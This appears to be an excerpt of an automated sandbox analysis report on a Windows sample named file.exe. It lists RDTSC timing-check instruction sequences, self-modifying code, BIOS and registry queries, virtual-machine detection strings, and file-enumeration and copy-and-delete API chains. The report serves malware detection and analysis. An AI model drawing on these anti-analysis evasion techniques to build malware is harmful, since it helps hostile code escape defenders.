              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6FC9 second address: 9B6FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 jbe 00007F052CBC2106h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6FDE second address: 9B6FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CEB1F1Eh 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b jg 00007F052CEB1F16h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6FFA second address: 9B7002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B893F second address: 9B895C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F052CEB1F23h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B895C second address: 9B897B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F052CBC2116h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B897B second address: 9B898F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a jc 00007F052CEB1F3Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B898F second address: 9B8995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB292 second address: 9BB296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB296 second address: 9BB2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F052CBC2115h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB2B6 second address: 9BB2BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB4B6 second address: 9BB4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC2112h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB4CD second address: 9BB54E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F052CEB1F21h 0x00000008 jne 00007F052CEB1F16h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 call 00007F052CEB1F22h 0x00000019 pushad 0x0000001a mov ecx, dword ptr [ebp+122D2BE2h] 0x00000020 jmp 00007F052CEB1F22h 0x00000025 popad 0x00000026 pop edx 0x00000027 push 00000004h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007F052CEB1F18h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 push 77CE1561h 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b js 00007F052CEB1F16h 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB777 second address: 9BB77C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB77C second address: 9BB782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB782 second address: 9BB786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB786 second address: 9BB7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edx, dword ptr [ebp+122D2AD4h] 0x0000000f push dword ptr [ebp+122D17CEh] 0x00000015 sub edx, dword ptr [ebp+1246FF22h] 0x0000001b call 00007F052CEB1F19h 0x00000020 push ebx 0x00000021 push edi 0x00000022 jl 00007F052CEB1F16h 0x00000028 pop edi 0x00000029 pop ebx 0x0000002a push eax 0x0000002b jmp 00007F052CEB1F1Dh 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F052CEB1F29h 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB7E1 second address: 9BB7EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F052CBC2106h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB7EB second address: 9BB7EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB7EF second address: 9BB808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F052CBC2106h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB808 second address: 9BB80C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCC65 second address: 9BCC69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCC69 second address: 9BCC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F052CEB1F16h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCC79 second address: 9BCC7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCC7D second address: 9BCC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCC83 second address: 9BCCA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F052CBC2117h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCCA4 second address: 9BCCDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F052CEB1F21h 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F052CEB1F29h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90245 second address: 4C9025E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC2111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9025E second address: 4C90289 instructions: 0x00000000 rdtsc 0x00000002 call 00007F052CEB1F29h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, 79F237B4h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90289 second address: 4C9028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9028D second address: 4C90293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90293 second address: 4C902AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC210Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C902AC second address: 4C902B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C902B0 second address: 4C902B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C902B6 second address: 4C90300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push esi 0x0000000d pushfd 0x0000000e jmp 00007F052CEB1F1Dh 0x00000013 and ch, 00000036h 0x00000016 jmp 00007F052CEB1F21h 0x0000001b popfd 0x0000001c pop esi 0x0000001d mov ah, dl 0x0000001f popad 0x00000020 pop ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov di, ax 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9036B second address: 4C90387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F052CBC2118h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90387 second address: 4C9038B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9038B second address: 4C903CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushfd 0x0000000f jmp 00007F052CBC2119h 0x00000014 and esi, 1ACE9FC6h 0x0000001a jmp 00007F052CBC2111h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C903CC second address: 4C903FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F052CEB1F27h 0x00000008 push eax 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F052CEB1F21h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C903FF second address: 4C9042B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC2111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F052CBC210Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9042B second address: 4C9042F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9042F second address: 4C9044C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC2119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9044C second address: 4C90452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90452 second address: 4C90456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D95FA second address: 8D95FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 71D4E2 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 957C3E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27177
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-25995
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004E18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004E3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004E1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004E1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004EE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004E4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004E4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004ECBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004ECBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004DDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004DDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_004E2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004E23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004ED530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004ED530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_004EDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004D16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004D16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_004F1BF0
              Source: file.exe, file.exe, 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2239380826.0000000000D25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarez
